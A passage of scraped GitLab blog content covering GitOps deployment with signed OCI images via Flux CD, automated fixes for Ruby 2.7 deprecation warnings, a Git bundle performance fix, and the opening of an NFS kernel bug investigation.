reconciled by a [controller](https://kubernetes.io/docs/concepts/architecture/controller/) running on the Kubernetes cluster where the microservice is deployed to. This allows engineers to manage infrastructure using the same workflows as working with regular code, such as opening merge requests to make and review changes and versioning changes. 
GitOps also has operational benefits such as [preventing configuration drift](https://about.gitlab.com/topics/gitops/#cicd) and helps engineers audit what changes led to certain outcomes with deployments.\n\n## Benefits and limitations of git in GitOps workflows\n\nWhile git is an essential piece of GitOps workflows, git repositories were not designed to be deployed by GitOps controllers. Git does provide the ability for engineers to collaborate on infrastructure changes and audit these changes later on, but controllers do not need to download an entire git repository for a successful deployment. GitOps controllers simply need the infrastructure defined for a particular environment.\n\nAdditionally, an important piece of the deployment process is to [sign and verify deployments](https://docs.sigstore.dev/about/overview/#why-cryptographic-signing) to assure deployment changes to an environment are coming from a trusted source. While git commits can be signed and verified by GitOps controllers, commits may also capture other details not related to the deployment itself (e.g., documentation changes, updates to other environments, and git repository restructuring) or not enough of the deployment picture as a deployment may consist of multiple commits. This again feels like a case this git feature wasn’t designed for.\n\nAnother challenging aspect of git in GitOps workflows is that it can sometimes lead to more automation than expected. Soon after merging a change to the watched branch, it will be deployed. There are no controls in the process outside of git. How can you make sure that nothing gets deployed on a Friday late afternoon? What if teams responsible for deployment do not have permissions to merge changes in certain GitLab projects? 
Using OCI images adds a pipeline into the process, including all the delivery control features, like [approvals or deploy freezes](https://docs.gitlab.com/ee/ci/environments/protected_environments.html).\n\n## OCI images\n\nThe [Open Container Initiative](https://opencontainers.org/) has helped to define standards around container formats. While most engineers are familiar with building Dockerfiles into container images, many may not be as familiar with storing Kubernetes manifests in a container registry. Because [GitLab’s Container Registry](https://docs.gitlab.com/ee/user/packages/container_registry/) is OCI compliant, it allows for users to push Kubernetes manifests for a particular environment to a container registry. GitOps controllers, such as [Flux CD](https://about.gitlab.com/blog/why-did-we-choose-to-integrate-fluxcd-with-gitlab/), can use the manifests stored in this OCI artifact instead of needing to clone an entire git repository.\n\nOften in GitOps workflows, a git repository can include the infrastructure definitions for all environments that a microservice will be deployed to. By packaging the Kubernetes manifests for only a specific environment, Flux CD can download the minimum files needed to carry out a deployment to a specific environment.\n\n### Security benefits of using OCI artifacts\n\nAs mentioned previously, signing and verifying the artifacts to be deployed to an environment adds an additional layer of security for software projects. After Kubernetes manifests are pushed to a container registry, a tool like [Sigstore Cosign](https://docs.sigstore.dev/quickstart/quickstart-cosign/) can be used to sign the OCI image with a private key that can be securely stored in a GitLab project as a [CI/CD variable](https://docs.gitlab.com/ee/ci/variables/). 
Flux CD can then use a public key stored on a Kubernetes cluster to verify that a deployment is coming from a trusted source.\n\n## Using GitLab to push and sign OCI images\n\nGitLab offers many features that help simplify the process of packaging, signing, and deploying OCI images. A common way to structure GitLab projects with GitOps workflows is to have separate GitLab projects for microservices’ code and a single infrastructure repository for all microservices. If an application is composed of `n` microservices, this would require having `n +1` GitLab projects for an application.\n\nThe artifact produced by a code project is usually a container image that will be used to package the application. The infrastructure or delivery project will contain the Kubernetes manifests defining all the resources required to scale and serve traffic to each microservice. The artifact produced by this project is usually an OCI image used to deploy the application and other manifests to Kubernetes.\n\nIn this setup, separation of environments is handled by defining Kubernetes manifests in separate folders. These folders represent environments (e.g., development, staging, and production) that will host the application. When changes are made to the code project and a new container image is pushed, all that needs to be done to deploy these changes via GitLab’s integration with Flux CD is to edit the manifests under the environment folder to include the new image reference and open a merge request. Once that merge request is reviewed, approved, and merged, the delivery project’s CI/CD job will push a new OCI image that Flux CD will pick up and deploy to the new environment.\n\n![OCI images - flow chart](https://res.cloudinary.com/about-gitlab-com/image/upload/v1750097611/Blog/Content%20Images/Blog/Content%20Images/image1_aHR0cHM6_1750097611046.png)\n\nSigning an OCI image is as simple as including Cosign in your project’s CI/CD job. 
You can simply generate a new public and private key with Cosign by running the commands below locally. Just make sure to log in to your GitLab instance with the [glab CLI](https://gitlab.com/gitlab-org/cli/#installation) and replace the [`PROJECT_ID`] for the Cosign command with your [delivery project’s ID](https://docs.gitlab.com/ee/user/project/working_with_projects.html#access-a-project-by-using-the-project-id).\n\n```\nglab auth login\ncosign generate-key-pair gitlab://[PROJECT_ID]\n```\n\nOnce the cosign command runs successfully, you can see the Cosign keys added to your project under the CI/CD variables section under the key names `COSIGN_PUBLIC_KEY` and `COSIGN_PRIVATE_KEY`.\n\n### Example CI/CD job\n\nA GitLab CI/CD job for pushing an OCI image will look something like the following:\n\n```yaml\nfrontend-deploy:\n  rules:\n  - if: $CI_COMMIT_BRANCH == $CI_DEFAULT_BRANCH\n    changes:\n      paths:\n      - manifests/dev/frontend-dev.yaml\n  trigger:\n    include:\n      - component: gitlab.com/components/fluxcd/oci-artifact@0.3.1\n        inputs:\n          version: 0.3.1\n          kubernetes_agent_reference: gitlab-da/projects/tanuki-bank/flux-config:dev\n          registry_image_url: \"oci://$CI_REGISTRY_IMAGE/frontend\"\n          image_tag: dev\n          manifest_path: ./manifests/dev/frontend-dev.yaml\n          flux_oci_repo_name: frontend\n          flux_oci_namespace_name: frontend-dev\n          signing_private_key: \"$COSIGN_PRIVATE_KEY\"\n```\n\nThe [GitLab CI/CD Catalog](https://about.gitlab.com/blog/ci-cd-catalog-goes-ga-no-more-building-pipelines-from-scratch/) offers a GitLab-maintained [CI/CD component for working with OCI artifacts and Flux CD](https://gitlab.com/explore/catalog/components/fluxcd). 
This component allows development teams to push Kubernetes manifests as OCI images to GitLab’s Container Registry or an external container registry, sign the OCI image using Cosign, and immediately reconcile the newly pushed image via Flux CD.\n\nIn the example above, the Flux CD `component` is included in a `.gitlab-ci.yml` file of a GitLab project. Using the component’s `inputs`, users can define what registry to push the image to (i.e., `registry_image_url` and `image_tag`), the file path to Kubernetes manifests that will be pushed (i.e., `manifest_path`), the Cosign private key used to sign images (i.e., `signing_private_key`), and the Kubernetes namespace and Flux CD [OCIRepository](https://fluxcd.io/flux/components/source/ocirepositories/) name needed to sync updates to an environment (i.e., `flux_oci_namespace_name` and `flux_oci_repo_name`).\n\nThe `kubernetes_agent_reference` allows GitLab CI/CD jobs to inherit the `kubeconfig` needed to access a Kubernetes cluster without needing to store a `kubeconfig` CI/CD variable in each GitLab project. By setting up the [GitLab agent for Kubernetes](https://docs.gitlab.com/ee/user/clusters/agent/), you can configure all GitLab projects’ CI/CD jobs in a [GitLab group](https://docs.gitlab.com/ee/user/group/) to inherit permissions to deploy to the Kubernetes cluster.\n\nThe agent for Kubernetes context is typically configured wherever you configure the GitLab Agent for Kubernetes in your GitLab group. It is typically recommended that this be done in the project where Flux CD is managed. More information on configuring the agent for CI/CD access can be found in our [CI/CD workflow documentation](https://docs.gitlab.com/ee/user/clusters/agent/ci_cd_workflow.html).\n\nThe variables `$COSIGN_PRIVATE_KEY`, `$FLUX_OCI_REPO_NAME`, and `$FRONTEND_DEV_NAMESPACE` are values stored as CI/CD variables to easily access and mask these sensitive pieces of data in CI/CD logs. 
The `$CI_REGISTRY_IMAGE` is a variable that GitLab jobs have available by default that specifies the GitLab project’s container registry.\n\n### Deploy OCI images\n\nUsing [Flux CD with your GitLab projects](https://docs.gitlab.com/ee/user/clusters/agent/gitops/flux_tutorial.html), you can automate deployments and signing verification for your microservice’s environments. Once Flux CD is configured to sync from a GitLab project, you could add the following Kubernetes [custom resource definitions](https://kubernetes.io/docs/concepts/extend-kubernetes/api-extension/custom-resources/) to your project to sync your pushed OCI image.\n\n```yaml\napiVersion: v1\nkind: Namespace\nmetadata:\n  name: frontend-dev\n  labels:\n    name: frontend-dev\n---\napiVersion: bitnami.com/v1alpha1\nkind: SealedSecret\nmetadata:\n  name: cosign-public-key\n  namespace: frontend-dev\nspec:\n  encryptedData:\n    cosign.pub: AgAKgLf4VbVzJOmr6++k81LlFayx88AELaUQFNOaXmBF4G+fBfBYeABl0skNvMAa1UrPVNSfMIHgFoYHoO96g576a+epk6V6glOI+++XvYbfsygof3GGxe0nL5Qh2b3ge0fNpyd0kTPSjTj0YUhRhKtMGMRSRw1jrwhNcGxCHK+Byibs52v8Np49KsIkeZKbzLdgYABkrv+k0j7hQM+jR180NpG+2UiRvaXpPuogxkbj61FEqWGrJHk8IVyfl3eh+YhoXxOHGDqko6SUC+bUZPDBlU6yKegO0/8Zq3hwulrSEsEjzRZNK+RFVMOLWWuC6h+WGpYhAMcsZPwjjJ/y29KLNa/YeqkN/cdk488QyEFc6ehCxzhH67HxIn2PDa+KkEOTv2TuycGF+Q00jKIizXF+IwLx/oRb3pTCF0AoAY8D8N3Ey+KfkOjsBON7gGID8GbQiJqX2IgIZxFMk0JRzxbRKOEqn+guLd5Shj7CD1a1Mkk0DxBdbqrGv2XNYUaFPI7xd3rZXUJZlnv+fsmwswsiGWRuXwim45HScWzQnfgLAe7tv3spVEGeaO5apl6d89uN21PBQnfE/zyugB//7ZW9tSp6+CSMyc5HynxI8diafqiwKPgvzLmVWRnkvxJijoXicRr3sCo5RudZPSlnjfd7CKdhwEVvLl7dRR4e/XBMdxCzk1p52Pl+3/kJR+LJii5+iwOpYrpVltSZdzc/3qRd19yMpc9PWpXYi7HxTb24EOQ25i21eDJY1ceplDN6bRtop2quzkjlwVeE2i4cEsX/YG8QBtQbop/3fjiAjKaED3QH3Ul0PECS9ARTScSkcOL3I00Xpp8DyD+xH0/i9wCBRDmH3yKX18C8VrMq02ALSnlP7WCVVjCPzubqKx2LPZRxK9EG0fylwv/vWQzTUUwfbPQZsd4c75bSTsTvxqp/UcFaXA==\n  template:\n    metadata:\n      name: cosign-public-key\n      namespace: frontend-dev\n---\napiVersion: 
source.toolkit.fluxcd.io/v1beta2\nkind: OCIRepository\nmetadata:\n    name: frontend\n    namespace: frontend-dev\nspec:\n    interval: 1m\n    url: oci://registry.gitlab.com/gitlab-da/projects/tanuki-bank/tanuki-bank-delivery/frontend\n    ref:\n        tag: dev\n    verify:\n      provider: cosign\n      secretRef:\n        name: cosign-public-key\n---\napiVersion: kustomize.toolkit.fluxcd.io/v1\nkind: Kustomization\nmetadata:\n    name: frontend\n    namespace: frontend-dev\nspec:\n    interval: 1m\n    targetNamespace: frontend-dev\n    path: \".\"\n    sourceRef:\n        kind: OCIRepository\n        name: frontend\n    prune: true\n```\n\nThe [`Kustomization`](https://fluxcd.io/flux/components/kustomize/kustomizations/) resource allows for further customization of Kubernetes manifests and also specifies which namespace to deploy resources to. The `OCIRepository` resource for Flux CD allows users to specify the OCI image repository reference and tag to regularly sync from. Additionally, you will notice the `verify.provider` and `verify.secretRef` properties. These fields allow you to verify that the OCI image deployed to the cluster was signed by the corresponding Cosign private key used in the earlier CI/CD job.\n\nThe public key needs to be stored in a [Kubernetes secret](https://kubernetes.io/docs/concepts/configuration/secret/) that will need to be present in the same namespace as the `OCIRepository` resource. To have this secret managed by Flux CD and not store the secret in plain text, you can consider using [SealedSecrets](https://fluxcd.io/flux/guides/sealed-secrets/) to encrypt the value and have it be decrypted cluster side by a controller.\n\nFor a simpler approach not requiring SealedSecrets, you can [deploy the secret via a GitLab CI/CD](https://docs.gitlab.com/ee/user/clusters/agent/getting_started_deployments.html) job using the [`kubectl CLI`](https://kubernetes.io/docs/reference/kubectl/). 
In the non-sealed secret approach, you would simply remove the SealedSecret included above and run the job to deploy the public key secret before running the job to push the new OCI image. This will make sure the secret is stored securely in GitLab and make sure the secret can be accessed on the cluster by the OCIRepository. While this approach is a bit simpler, just note this is not a suitable approach for managing secrets in production.\n\n## The benefits of OCI, GitLab, and GitOps\n\nOCI artifacts allow for GitOps teams to take deployments even further with added security benefits and allowing for deployments to be minimal. Users still gain all the benefits offered by git as far as having a source of truth for infrastructure and collaborating on projects. OCI images add a packaging approach that improves the deployment aspect of GitOps.\n\nGitLab continues to learn from our customers and the cloud native community on building experiences that help simplify GitOps workflows. To get started using some of the features mentioned in this blog, you can sign up for a [60-day free trial of GitLab Ultimate](https://about.gitlab.com/free-trial/). 
We would also love to hear from users about their experiences with these tools, and you can provide feedback in the [community forum](https://forum.gitlab.com/t/oci-images-as-source-of-truth-for-gitops-with-gitlab/120965).\n",[109,9,1038,537,751,752],{"slug":3210,"featured":6,"template":689},"how-to-use-oci-images-as-the-source-of-truth-for-continuous-delivery","content:en-us:blog:how-to-use-oci-images-as-the-source-of-truth-for-continuous-delivery.yml","How To Use Oci Images As The Source Of Truth For Continuous Delivery","en-us/blog/how-to-use-oci-images-as-the-source-of-truth-for-continuous-delivery.yml","en-us/blog/how-to-use-oci-images-as-the-source-of-truth-for-continuous-delivery",{"_path":3216,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3217,"content":3223,"config":3229,"_id":3231,"_type":14,"title":3232,"_source":16,"_file":3233,"_stem":3234,"_extension":19},"/en-us/blog/how-we-automatically-fixed-hundreds-of-ruby-2-7-deprecation-warnings",{"title":3218,"description":3219,"ogTitle":3218,"ogDescription":3219,"noIndex":6,"ogImage":3220,"ogUrl":3221,"ogSiteName":673,"ogType":674,"canonicalUrls":3221,"schema":3222},"How we automatically fixed thousands of Ruby 2.7 deprecation warnings","The upgrade to Ruby 2.7 for GitLab involved thousands of deprecation warnings across hundreds of files. 
Here's how we fixed most of them.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749681882/Blog/Hero%20Images/daria-nepriakhina-zNU3ErDAbAw-unsplash.jpg","https://about.gitlab.com/blog/how-we-automatically-fixed-hundreds-of-ruby-2-7-deprecation-warnings","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"How we automatically fixed thousands of Ruby 2.7 deprecation warnings\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Thong Kuah\"}],\n        \"datePublished\": \"2021-02-03\",\n      }",{"title":3218,"description":3219,"authors":3224,"heroImage":3220,"date":3226,"body":3227,"category":801,"tags":3228},[3225],"Thong Kuah","2021-02-03","\n\nRuby 3.0 was just released on Dec. 25, 2020, with some new features and some breaking changes.\nGitLab was at Ruby 2.6, and we wanted to upgrade to Ruby 2.7 in preparation to eventually upgrade to Ruby 3.\n\nIn Ruby 3.0, [positional and keyword arguments will be separated](https://www.ruby-lang.org/en/news/2019/12/12/separation-of-positional-and-keyword-arguments-in-ruby-3-0/). To help developers prepare for this, in Ruby 2.7,\nwarnings were added. In GitLab, we discovered we have [thousands\nof such warnings](https://gitlab.com/gitlab-org/gitlab/-/issues/257438) across hundreds of files:\n\n```\nwarning: Using the last argument as keyword parameters is deprecated; maybe ** should be added to the call\n```\n\n## Boring solutions\n\nTo address this warning, the obvious, and boring solution was to simply add `**` to the last keyword argument.\nFor the most part, this is what we did. However, while this was under way, we also developed a RuboCop check that could\ndetect, and automatically fix the keyword arguments. 
The benefit for this approach was that we can\n[autocorrect](https://docs.rubocop.org/rubocop/usage/auto_correct.html) any existing warnings en masse.\n\nThe tricky part about this is that RuboCop is designed to statically analyze Ruby code, whereas the warnings were\ngenerated by Ruby at runtime.\n\n## A way forward\n\nAfter some research, we found a way to utilize our comprehensive RSpec test suite to\ngather all the warnings using the [Deprecation Toolkit gem](https://github.com/shopify/deprecation_toolkit). We also\nconsidered using the [warning gem](https://github.com/jeremyevans/ruby-warning) at one point, but preferred Deprecation Toolkit\nas the results were easier to process.\n\nDeprecation Toolkit supports RSpec out of the box, so it was really simple to configure. It also has a simple YAML-based file format to record all deprecations. We then adapted this to record deprecation warnings for Ruby 2.7\nlast keyword arguments with:\n\n```ruby\n  kwargs_warnings = [\n    # Taken from https://github.com/jeremyevans/ruby-warning/blob/1.1.0/lib/warning.rb#L18\n    %r{warning: (?:Using the last argument (?:for `.+' )?as keyword parameters is deprecated; maybe \\*\\* should be added to the call|Passing the keyword argument (?:for `.+' )?as the last hash parameter is deprecated|Splitting the last argument (?:for `.+' )?into positional and keyword parameters is deprecated|The called method (?:`.+' )?is defined here)\\n\\z}\n  ]\n  DeprecationToolkit::Configuration.warnings_treated_as_deprecation = kwargs_warnings\n```\n\nLastly, we wrote a new RuboCop check, called\n[`Lint/LastKeywordArgument`](https://gitlab.com/gitlab-org/gitlab/-/blob/632b7768f7f9014951170a006489d66b34001c68/rubocop/cop/lint/last_keyword_argument.rb),\nthat checks against the YAML files generated by Deprecation Toolkit, and\ngenerates offenses. Now we can very quickly, statically check the whole GitLab\ncodebase, and even autocorrect! 
You can see how [Deprecation Toolkit and the\n`LastKeywordArgument` check was put together in this merge\nrequest](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/47720). You can\nsee a sample output from running the `LastKeywordArgument` cop check:\n\n![LastKeywordArgument RuboCop offenses](https://about.gitlab.com/images/blogimages/last-keyword-argument-rubocop-offenses.png){: .shadow.center}\nSample output from running the `LastKeywordArgument` cop check\n{: .note .text-center}\n\n## Automatically fix everything\n\nNow that we have an automatic RuboCop check, which can also autocorrect, we can create merge requests to autocorrect!\nFor example, we autocorrected 62 instances across [39 spec files](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/48407).\nAutomation for the win!\n\nWe then went one step further, and integrated this in our GitLab CI pipelines. Using the `artifacts` feature of GitLab CI, we\ngathered the `deprecations` directory from all RSpec jobs (we have about 400 such jobs). After all the RSpec jobs have passed, we then made a `post-test` job to\n[check the results](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/49792) with the `LastKeywordArgument` cop. Below is a\nsnippet of the GitLab CI `.gitlab-ci.yml` configuration:\n\n```yaml\nstages:\n  - test\n  - post-test\n\n# This inherited job is used by all RSpec jobs\n.rspec-base:\n  stage: test\n  artifacts:\n    - deprecations/\n\n# GitLab CI job artifacts from previous stages are passed to this job\nrspec:deprecations:\n  stage: post-test\n  script:\n    - bundle exec rubocop --only Lint/LastKeywordArgument --parallel\n  artifacts:\n    - deprecations/\n```\n\nThis enabled us to have a single job where [we can see all deprecation warnings](https://gitlab.com/gitlab-org/gitlab/-/jobs/991299621).\n\n## Conclusion\n\nWith this measure we went from about 30,000 warnings related to keyword arguments to about 800 remaining warnings, largely stemming from\ndependencies. 
Feel free to follow our progress in [GitLab issue #257438](https://gitlab.com/gitlab-org/gitlab/-/issues/257438), and contribute to\nfix the remaining warnings if you are interested!\n\nCover image by [Daria Nepriakhina](https://unsplash.com/@epicantus) on [Unsplash](https://unsplash.com/photos/zNU3ErDAbAw)\n{: .note}\n",[9],{"slug":3230,"featured":6,"template":689},"how-we-automatically-fixed-hundreds-of-ruby-2-7-deprecation-warnings","content:en-us:blog:how-we-automatically-fixed-hundreds-of-ruby-2-7-deprecation-warnings.yml","How We Automatically Fixed Hundreds Of Ruby 2 7 Deprecation Warnings","en-us/blog/how-we-automatically-fixed-hundreds-of-ruby-2-7-deprecation-warnings.yml","en-us/blog/how-we-automatically-fixed-hundreds-of-ruby-2-7-deprecation-warnings",{"_path":3236,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3237,"content":3243,"config":3250,"_id":3252,"_type":14,"title":3253,"_source":16,"_file":3254,"_stem":3255,"_extension":19},"/en-us/blog/how-we-decreased-gitlab-repo-backup-times-from-48-hours-to-41-minutes",{"title":3238,"description":3239,"ogTitle":3238,"ogDescription":3239,"noIndex":6,"ogImage":3240,"ogUrl":3241,"ogSiteName":673,"ogType":674,"canonicalUrls":3241,"schema":3242},"How we decreased GitLab repo backup times from 48 hours to 41 minutes","Learn how we tracked a performance bottleneck to a 15-year-old Git function and fixed it, leading to enhanced efficiency that supports more robust backup strategies and can reduce risk.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1750097166/Blog/Hero%20Images/Blog/Hero%20Images/REFERENCE%20-%20display%20preview%20for%20blog%20images%20%282%29_2pKf8RsKzAaThmQfqHIaa7_1750097166565.png","https://about.gitlab.com/blog/how-we-decreased-gitlab-repo-backup-times-from-48-hours-to-41-minutes","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"How we decreased GitLab repo backup times from 48 hours to 41 
minutes\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Karthik Nayak\"},{\"@type\":\"Person\",\"name\":\"Manuel Kraft\"}],\n        \"datePublished\": \"2025-06-05\",\n      }",{"title":3238,"description":3239,"authors":3244,"heroImage":3240,"date":3247,"body":3248,"category":801,"tags":3249},[3245,3246],"Karthik Nayak","Manuel Kraft","2025-06-05","Repository backups are a critical component of any robust disaster recovery strategy. However, as repositories grow in size, the process of creating reliable backups becomes increasingly challenging.  Our own [Rails repository](https://gitlab.com/gitlab-org/gitlab) was taking 48 hours to back up — forcing impossible choices between backup frequency and system performance. We wanted to tackle this issue for our customers and for our own users internally. \n\nUltimately, we traced the issue to a 15-year-old Git function with O(N²) complexity and fixed it with an algorithmic change, __reducing backup times exponentially__. The result: lower costs, reduced risk, and backup strategies that actually scale with your codebase.\n\nThis turned out to be a Git scalability issue that affects anyone with large repositories. Here's how we tracked it down and fixed it. \n\n## Backup at scale\n\nFirst, let's look at the problem. As organizations scale their repositories and backups grow more complex, here are some of the challenges they can face:\n\n* **Time-prohibitive backups:** For very large repositories, creating a repository backup could take several hours, which can hinder the ability to schedule regular backups. 
\n* **Resource intensity:** Extended backup processes can consume substantial server resources, potentially impacting other operations.\n* **Backup windows:** Finding adequate maintenance windows for such lengthy processes can be difficult for teams running 24/7 operations.\n* **Increased failure risk:** Long-running processes are more susceptible to interruptions from network issues, server restarts, and system errors, which can force teams to restart the entire very long backup process from scratch.\n* **Race conditions:** Because it takes a long time to create a backup, the repository might have changed a lot during the process, potentially creating an invalid backup or interrupting the backup because objects are no longer available.\n\nThese challenges can lead to compromising on backup frequency or completeness – an unacceptable trade-off when it comes to data protection. Extended backup windows can force customers into workarounds. Some might adopt external tooling, while others might reduce backup frequency, resulting in potential inconsistent data protection strategies across organizations.\n\nNow, let's dig into how we identified a performance bottleneck, found a resolution, and deployed it to help cut backup times.\n\n## The technical challenge\n\nGitLab's repository backup functionality relies on the [`git bundle create`](https://git-scm.com/docs/git-bundle) command, which captures a complete snapshot of a repository, including all objects and references like branches and tags. This bundle serves as a restoration point for recreating the repository in its exact state.\n\nHowever, the implementation of the command suffered from poor scalability related to reference count, creating a performance bottleneck. As repositories accumulated more references, processing time increased quadratically. 
In our largest repositories containing millions of references, backup operations could extend beyond 48 hours.\n\n### Root cause analysis\n\nTo identify the root cause of this performance bottleneck, we analyzed a flame graph of the command during execution.\n\n![Flame graph showing command during execution](https://res.cloudinary.com/about-gitlab-com/image/upload/v1750097176/Blog/Content%20Images/Blog/Content%20Images/image1_aHR0cHM6_1750097176388.jpg)\n\nA flame graph displays the execution path of a command through its stack trace. Each bar corresponds to a function in the code, with the bar's width indicating how much time the command spent executing within that particular function.\n\nWhen examining the flame graph of `git bundle create` running on a repository with 10,000 references, approximately 80% of the execution time is consumed by the `object_array_remove_duplicates()` function. This function was introduced to Git in the [commit b2a6d1c686](https://gitlab.com/gitlab-org/git/-/commit/b2a6d1c686) (bundle: allow the same ref to be given more than once, 2009-01-17).\n\nTo understand this change, it's important to know that `git bundle create` allows users to specify which references to include in the bundle. For complete repository bundles, the `--all` flag packages all references.\n\nThe commit addressed a problem where users providing duplicate references through the command line – such as `git bundle create main.bundle main main` - would create a bundle without properly handling the duplicated main reference. Unbundling this bundle in a Git repository would break, because it tries to write the same ref twice. The code to avoid duplication uses nested `for` loops that iterate through all references to identify duplicates. 
This O(N²) algorithm becomes a significant performance bottleneck in repositories with large reference counts, consuming substantial processing time.\n\n### The fix: From O(N²) to efficient mapping\n\nTo resolve this performance issue, we contributed an upstream fix to Git that replaces the nested loops with a map data structure. Each reference is added to the map, which automatically ensures only a single copy of each reference is retained for processing.\n\nThis change dramatically enhances the performance of `git bundle create` and enables much better scalability in repositories with large reference counts. Benchmark testing on a repository with 10,000 references demonstrates a 6x performance improvement.\n\n```shell\nBenchmark 1: bundle (refcount = 100000, revision = master)\n  Time (mean ± σ): \t14.653 s ±  0.203 s\t[User: 13.940 s, System: 0.762 s]\n  Range (min … max):   14.237 s … 14.920 s\t10 runs\n\nBenchmark 2: bundle (refcount = 100000, revision = HEAD)\n  Time (mean ± σ):  \t2.394 s ±  0.023 s\t[User: 1.684 s, System: 0.798 s]\n  Range (min … max):\t2.364 s …  2.425 s\t10 runs\n\nSummary\n  bundle (refcount = 100000, revision = HEAD) ran\n\t6.12 ± 0.10 times faster than bundle (refcount = 100000, revision = master)\n```\n\nThe patch was accepted and [merged](https://gitlab.com/gitlab-org/git/-/commit/bb74c0abbc31da35be52999569ea481ebd149d1d) into upstream Git. 
At GitLab, we backported this fix to ensure our customers could benefit immediately, without waiting for the next Git release.\n\n## The result: Dramatically decreased backup times\n\nThe performance gains from this improvement have been nothing short of transformative:\n\n* **From 48 hours to 41 minutes:** Creating a backup of our largest repository (`gitlab-org/gitlab`) now takes just 1.4% of the original time.\n* **Consistent performance:** The improvement scales reliably across repository sizes.\n* **Resource efficiency:** We significantly reduced server load during backup operations.\n* **Broader applicability:** While backup creation sees the most dramatic improvement, all bundle-based operations that operate on many references benefit.\n\n## What this means for GitLab customers\n\nFor GitLab customers, this enhancement delivers immediate and tangible benefits on how organizations approach repository backup and disaster recovery planning:\n* **Transformed backup strategies**   \n  * Enterprise teams can establish comprehensive nightly schedules without impacting development workflows or requiring extensive backup windows.   \n  * Backups can now run seamlessly in the background during nightly schedules, instead of needing to be dedicated and lengthy.  \n* **Enhanced business continuity**  \n  * With backup times reduced from days to minutes, organizations significantly minimize their recovery point objectives (RPO). This translates to reduced business risk – in a disaster scenario, you're potentially recovering hours of work instead of days.  \n* **Reduced operational overhead**   \n  * Less server resource consumption and shorter maintenance windows.  \n  * Shorter backup windows mean reduced compute costs, especially in cloud environments, where extended processing time translates directly to higher bills.  \n* **Future-proofed infrastructure**   \n  * Growing repositories no longer force difficult choices between backup frequency and system performance.   
\n  * As your codebase expands, your backup strategy can scale seamlessly alongside it\n\nOrganizations can now implement more robust backup strategies without compromising on performance or completeness. What was once a challenging trade-off has become a straightforward operational practice.\n\nStarting with the [GitLab 18.0](https://about.gitlab.com/releases/2025/05/15/gitlab-18-0-released/) release, all GitLab customers regardless of their license tier can already fully take advantage of these improvements for their [backup](https://docs.gitlab.com/administration/backup_restore/backup_gitlab/) strategy and execution. There is no further change in configuration required.\n\n## What's next\n\nThis breakthrough is part of our ongoing commitment to scalable, enterprise-grade Git infrastructure. While the improvement of 48 hours to 41 minutes for backup creation time represents a significant milestone, we continue to identify and address performance bottlenecks throughout our stack.\n\nWe're particularly proud that this enhancement was contributed upstream to the Git project, benefiting not just GitLab users but the broader Git community. This collaborative approach to development ensures that improvements are thoroughly reviewed, widely tested, and available to all.\n\n> Deep infrastructure work like this is how we approach performance at GitLab. Join the GitLab 18 virtual launch event to see what other fundamental improvements we're shipping. 
[Register today!](https://about.gitlab.com/eighteen/)",[751,9,1495,753,482],{"slug":3251,"featured":91,"template":689},"how-we-decreased-gitlab-repo-backup-times-from-48-hours-to-41-minutes","content:en-us:blog:how-we-decreased-gitlab-repo-backup-times-from-48-hours-to-41-minutes.yml","How We Decreased Gitlab Repo Backup Times From 48 Hours To 41 Minutes","en-us/blog/how-we-decreased-gitlab-repo-backup-times-from-48-hours-to-41-minutes.yml","en-us/blog/how-we-decreased-gitlab-repo-backup-times-from-48-hours-to-41-minutes",{"_path":3257,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3258,"content":3264,"config":3270,"_id":3272,"_type":14,"title":3273,"_source":16,"_file":3274,"_stem":3275,"_extension":19},"/en-us/blog/how-we-spent-two-weeks-hunting-an-nfs-bug",{"title":3259,"description":3260,"ogTitle":3259,"ogDescription":3260,"noIndex":6,"ogImage":3261,"ogUrl":3262,"ogSiteName":673,"ogType":674,"canonicalUrls":3262,"schema":3263},"How we spent two weeks hunting an NFS bug in the Linux kernel","Here's an in-depth recap of debugging a GitLab issue that culminated in a patch for the Linux kernel.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749672173/Blog/Hero%20Images/nfs-bug-hunt-detective.jpg","https://about.gitlab.com/blog/how-we-spent-two-weeks-hunting-an-nfs-bug","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"How we spent two weeks hunting an NFS bug in the Linux kernel\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Stan Hu\"}],\n        \"datePublished\": \"2018-11-14\",\n      }",{"title":3259,"description":3260,"authors":3265,"heroImage":3261,"date":3267,"body":3268,"category":801,"tags":3269},[3266],"Stan Hu","2018-11-14","\n\nUPDATE 2019-08-06: This bug has now been resolved in the following\ndistributions:\n\n* [Red Hat Enterprise Linux 7](https://access.redhat.com/errata/RHSA-2019:2029)\n* 
[Ubuntu](https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1802585)\n* Linux mainline: Backported to [4.14-stable](https://lkml.org/lkml/2019/8/2/562) and [4.19-stable](https://lkml.org/lkml/2019/8/2/639)\n\nOn Sep. 14, the GitLab support team escalated a critical\nproblem encountered by one of our customers: GitLab would run fine for a\nwhile, but after some time users encountered errors. When attempting to\nclone certain repositories via Git, users would see an opaque `Stale\nfile error` message. The error message persisted for a long time,\nblocking employees from being able to work, unless a system\nadministrator intervened manually by running `ls` in the directory\nitself.\n\nThus launched an investigation into the inner workings of Git and the\nNetwork File System (NFS). The investigation uncovered a bug with the\nLinux v4.0 NFS client and culiminated with a [kernel patch that was written by\nTrond Myklebust](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?h=be189f7e7f03de35887e5a85ddcf39b91b5d7fc1)\nand [merged in the latest mainline Linux kernel](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?h=c7a2c49ea6c9eebbe44ff2c08b663b2905ee2c13)\non Oct. 26.\n\nThis post describes the journey of investigating the issue and\ndetails the thought process and tools by which we tracked down the\nbug. It was inspired by the fine detective work in [How I spent two\nweeks hunting a memory leak in 